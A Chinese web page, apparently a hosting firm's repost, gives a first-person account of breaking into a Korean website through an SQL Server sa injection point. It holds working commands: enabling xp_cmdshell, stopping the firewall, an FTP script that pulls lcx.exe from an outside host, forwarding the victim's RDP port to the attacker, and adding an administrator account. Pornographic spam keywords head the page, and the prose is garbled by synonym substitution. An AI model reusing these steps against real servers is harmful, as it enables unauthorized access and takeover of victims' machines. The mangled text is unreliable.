欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到夢飛科技

網絡技術

當前優惠活動:

sqlserver sa入侵滲透進程

下午搞了一個站,存在sa注入點裂痕,,window 2000+iis5。

通過注入點信息,發明sqlserver版本為7.00,以前見過一次這個版本,不外沒有怎么深入研究,伴侶掃弱口令掃描到的,其時也提權了,詳細健忘怎么提的了。附圖。

sqlserver sa入侵滲透歷程

掃描這個ip地點發明只對外開放了53跟80,韓國的鳥站,由此揣摩大概為內網可能外網可是限制了對外開放的端口。一般環境下會開啟1433,跟3389的可是限制對外毗連。

sqlserver7.0的固然以前搞過,可是健忘詳細怎么弄了,于是一步一步的先用穿山甲自帶的成果規復xp_cmdshell,sp_oa**,sp_***job,尚有一個sandboxmode沙盒模式。都開啟之后,隨便執行set,ipconfig等呼吁發明沒有回顯,也不知道哪個組件可以呼吁。于是想到一個步伐。

此刻我本機執行lcx -listen 77 88通過77端口監聽外部來的數據。然后在穿山甲里執行net stop sharedaccess通過xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一執行,固然不知道樂成沒,可是假如可以執行呼吁,必定可以樂成,目標是為了是對方呆板能對外發送數據。接著跟適才一樣執行telnet 我的ip 22端口,最終發明通過沙盒模式可以執行呼吁。

sqlserver sa入侵滲透歷程

可是對方的3389不答允毗連,這時候想通過lcx端口轉發來毗連對方的3389,固然不確定是3389可是碰碰命運。

個中的ftp傳文件下載文件我親自測試過,就用這個了。

echo open www.ftp.com>ftp.TXT //毗連FTP
echo username>>ftp.TXT       //輸入用戶名
echo password>>ftp.TXT       //輸入暗碼
echo get lcx c:lcx.exe>>ftp.TXT //執行下載呼吁
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //執行FTP.TXT文件中的FTP呼吁
在穿山甲里依次執行以下語句,假如沒有非凡環境。lcx就下載到對方呆板c盤目次下了。

然后通過沙河模式執行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389

本機執行lcx -listen 77 88。

過了一小會發明有數據返回,證明lcx已經傳上去了,而且將對方3389端口轉發到本機上了。sqlserver sa入侵滲透歷程

本機再毗連127.0.0.1:88,可以毗連上終端,然后在穿山甲執行添加用戶的呼吁net user user password /add

net localgroup administrators user /add毗連終端,樂成登岸。如圖。

sqlserver sa入侵滲透歷程
中間碰著一些問題就不說了。有什么疑問的可以提出來。

夢飛科技 - 全球數據中心基礎服務領先供應商

Copyright © 2003-2019 MFISP.COM. 國外服務器租用 IDC公司 版權所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 胶州市| 石嘴山市| 玉环县| 甘孜| 中江县| 运城市| 保靖县| 永兴县| 顺昌县| 上林县| 高碑店市| 益阳市| 香格里拉县| 西乌珠穆沁旗| 镇雄县| 石河子市| 佛坪县| 夏邑县| 泽库县| 增城市| 瑞昌市| 宜章县| 梅河口市| 长葛市| 双柏县| 咸阳市| 满洲里市| 张掖市| 丽水市| 牟定县| 乌苏市| 炉霍县| 哈尔滨市| 阳信县| 凤城市| 东光县| 苗栗县| 上林县| 玉龙| 北辰区| 方正县|